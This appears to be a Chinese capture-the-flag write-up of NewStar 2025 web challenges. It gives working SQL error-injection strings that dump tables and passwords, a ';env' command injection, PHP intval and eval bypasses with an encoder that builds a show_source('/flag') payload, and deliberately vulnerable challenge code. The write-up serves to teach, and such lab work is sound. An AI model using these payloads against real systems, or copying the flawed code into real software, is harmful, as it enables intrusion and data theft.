web

2025-newstar

week1

multi-headach3

根据提示先访问robots.txt,得/hidden.php,然后抓包发包flag在响应头

image-20251003095906858

strange_login

考点:报错注入

简单测试发现是sql单引号闭合,而且有报错,直接打sql 报错注入就行

1

1'/**/or/**/updatexml(1,concat('~',(select/**/database())),1)#
image-20251003102551946 
1

1'/**/or/**/updatexml(1,concat('~',(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())),1)#
image-20251003102629802 
1

1'/**/or/**/updatexml(1,concat('~',(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name="users")),1)#
image-20251003102706312

然后分别查一下字段没有flag,那根据题目提示说admin登入,显然是要得密码然后登入拿flag

1

1'/**/or/**/updatexml(1,concat('~',(select/**/group_concat(password)/**/from/**/`users`)),1)#

得到a7f8d9e2b3c4f5a6b7c8d9e0f1a2b3c,但是不对??可能是密码太长?没显示全?(显示的字符补全,那我们就分别查询,先查1-10,再查11-20,以此直到查到flag)

1

1'/**/or/**/updatexml(1,concat('~',mid((select/**/group_concat(password)/**/from/**/`users`),1,10)),1)#

查了三段a7f8d9e2b3,c4f5a6b7c8d9e0f1a2b3,d9e0f1a2b3c4显然第三段有点重复,所以拼接得到的密码是a7f8d9e2b3c4f5a6b7c8d9e0f1a2b3c4(直接查password就少一个4,绷不住),然后登入就有flag

黑客小W的故事(1)

根据提示抓包。count=1时每次发包多16,count=2时多32,那就直接让count=100,发一次包直接过

image-20251003112904304

替换token到下一关,这一关,进去提示shipin=mogubaozi,还有post传参,参数随便试试,值就是第二关开始对话的那个guding,得到要用delete方法

image-20251003115153909

宇宙的中心是php

考点:intval性质

查看你源码得s3kret.php

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

<?php
highlight_file(__FILE__);
include "flag.php";
if(isset($_POST['newstar2025'])){
    $answer = $_POST['newstar2025'];
    if(intval($answer)!=47&&intval($answer,0)==47){
        echo $flag;
    }else{
        echo "你还未参透奥秘";
    }
}

这就是十进制!=47,自动取整=47,显然利用intval性质,直接赋值0x2f 或 057就行

image-20251003211027519

输入是字符,这时候intval默认是10进制

PHP intval() 函数 | 菜鸟教程

别笑,你也过不了第二关

审计js代码,其实就算改分数

image-20251003211901238

1
2

score = 1000000; // 直接设置分数
scoreEl.innerText = "分数: " + score;

然后分数够了访问flag.php,然后post传参

1

score=1000000 (具体数值取决于通关时的分数)

image-20251003212024144

image-20251003211828579

我真得控制你了

审计js代码,想按按钮没成功,那就直接伪造发包

image-20251003214411239

然后一关弱口令admin/111111绕过

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42

<?php
error_reporting(0);

function generate_dynamic_flag($secret) {
    return getenv("ICQ_FLAG") ?: 'default_flag';
}


if (isset($_GET['newstar'])) {
    $input = $_GET['newstar'];
    
    if (is_array($input)) {
        die("恭喜掌握新姿势");
    }
    

    if (preg_match('/[^\d*\/~()\s]/', $input)) {
        die("老套路了,行不行啊");
    }
    

    if (preg_match('/^[\d\s]+$/', $input)) {
        die("请输入有效的表达式");
    }
    
    $test = 0;
    try {
        @eval("\$test = $input;");
    } catch (Error $e) {
        die("表达式错误");
    }
    
    if ($test == 2025) {
        $flag = generate_dynamic_flag($flag_secret);
        echo "<div class='success'>拿下flag!</div>";
        echo "<div class='flag-container'><div class='flag'>FLAG: {$flag}</div></div>";
    } else {
        echo "<div class='error'>大哥哥泥把数字算错了: $test ≠ 2025</div>";
    }
} else {
    ?>
<?php } ?>

代码限制

1
2
3
4

不能是数组:is_array($input) 必须为 false
字符限制:只能包含 \d*\/~()\s(数字、*/~、括号、空格)
不能纯数字:preg_match('/^[\d\s]+$/', $input) 必须为 false
目标:$test 必须等于 2025

那很简单了

1

2025*1		//	2025/1

week2

DD加速器

127.0.0.1;env就行,flag在环境

image-20251007143627000

白帽小K的故事(1)

搞点哦润吉吃吃橘

image-20251007160143196

image-20251007160159396

根据提示发现,start_challenge路由的响应set-cookie中的session作为verify_token中的session才行,然后我们再写代码提取token计算式然后计算提交就行

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52

import requests

def auto_challenge():
    base_url = "https://eci-2ze9i5ld3m7d7x4xrtqn.cloudeci1.ichunqiu.com:5000/"
    
    headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36",
    "Content-Type": "application/json",
    "Cookie": "session=eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoiRG9ybyJ9.aOTHvQ.b-mL3B7omr-6O1FRTNHSXya64GM"
    }
    
    session = requests.Session()
    session.headers.update(headers)
    
    try:
        # 1. 启动挑战
        start_response = session.post(f"{base_url}/start_challenge")
        if start_response.status_code != 200:
            return
        
        # 2. 获取新的session cookie
        new_session_cookie = None
        if 'Set-Cookie' in start_response.headers:
            set_cookie = start_response.headers['Set-Cookie']
            if 'session=' in set_cookie:
                new_session_cookie = set_cookie.split('session=')[1].split(';')[0]
                session.cookies.set('session', new_session_cookie)
        
        start_data = start_response.json()
        if "error" in start_data:
            return
        
        # 3. 获取表达式并计算token
        expression = start_data.get("expression", "")
        if not expression or "token =" not in expression:
            return
        
        calc_expr = expression.split("token =")[1].strip()
        token = eval(calc_expr)
        
        # 4. 提交验证
        submit_data = {"token": int(token)}
        submit_headers = {"Cookie": f"session={new_session_cookie}"} if new_session_cookie else headers
        
        submit_response = session.post(f"{base_url}/verify_token", json=submit_data, headers=submit_headers)
        print(submit_response.text)
        
    except Exception as e:
        print(f"错误: {e}")

if __name__ == "__main__":
    auto_challenge()

真的是签到诶 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37

<?php
highlight_file(__FILE__);

$cipher = $_POST['cipher'] ?? '';

function atbash($text) {
  $result = '';
  foreach (str_split($text) as $char) {
    if (ctype_alpha($char)) {
      $is_upper = ctype_upper($char);
      $base = $is_upper ? ord('A') : ord('a');
      $offset = ord(strtolower($char)) - ord('a');
      $new_char = chr($base + (25 - $offset));
      $result .= $new_char;
    } else {
      $result .= $char;
    }
  }
  return $result;
}

if ($cipher) {
  $cipher = base64_decode($cipher);
  $encoded = atbash($cipher);
  $encoded = str_replace(' ', '', $encoded);
  $encoded = str_rot13($encoded);
  @eval($encoded);
  exit;
}

$question = "真的是签到吗?";
$answer = "真的很签到诶!";

$res =  $question . "<br>" . $answer . "<br>";
echo $res . $res . $res . $res . $res;

?

过程

1
2
3
4
5

Base64解码:$cipher = base64_decode($cipher);
Atbash加密:$encoded = atbash($cipher);
去除空格:$encoded = str_replace(' ', '', $encoded);
ROT13加密:$encoded = str_rot13($encoded);
代码执行:@eval($encoded);

所以逆向代码如下

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45

<?php
// 简化版Payload生成器

function atbash($text) {
    $result = '';
    foreach (str_split($text) as $char) {
        if (ctype_alpha($char)) {
            $is_upper = ctype_upper($char);
            $base = $is_upper ? ord('A') : ord('a');
            $offset = ord(strtolower($char)) - ord('a');
            $new_char = chr($base + (25 - $offset));
            $result .= $new_char;
        } else {
            $result .= $char;
        }
    }
    return $result;
}


$code = "show_source('/flag');";  // print_r(scandir('/'));		绕过空格

// 生成payload - 逆向构造
$rot13_decoded = str_rot13($code);    // ROT13解密 
$atbash_decoded = atbash($rot13_decoded); // Atbash解密,这个函数既是加密也是解密,因为Atbash是自逆的
$payload = base64_encode($atbash_decoded); // Base64编码 

echo "原始代码: $code\n";
echo "ROT13解密: $rot13_decoded\n";
echo "Atbash解密: $atbash_decoded\n";
echo "最终Payload: $payload\n";
echo "POST数据: cipher=$payload\n";

// 验证过程
echo "\n=== 验证过程 ===\n";
$test1 = base64_decode($payload);
echo "Base64解码: $test1\n";
$test2 = atbash($test1);
echo "Atbash加密: $test2\n";
$test3 = str_replace(' ', '', $test2);
echo "去除空格: $test3\n";
$test4 = str_rot13($test3);
echo "ROT13加密: $test4\n";
echo "最终执行: $test4\n";
?>
Emo
谢谢观看